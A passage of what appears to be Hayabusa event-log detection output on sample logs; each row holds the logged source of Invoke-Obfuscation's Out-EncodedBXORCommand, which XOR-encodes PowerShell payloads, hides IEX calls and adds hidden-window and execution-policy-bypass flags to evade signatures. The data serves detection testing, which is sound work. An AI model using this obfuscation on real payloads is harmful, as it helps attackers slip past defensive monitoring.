If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. 
@('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. 
If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. 
$HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above 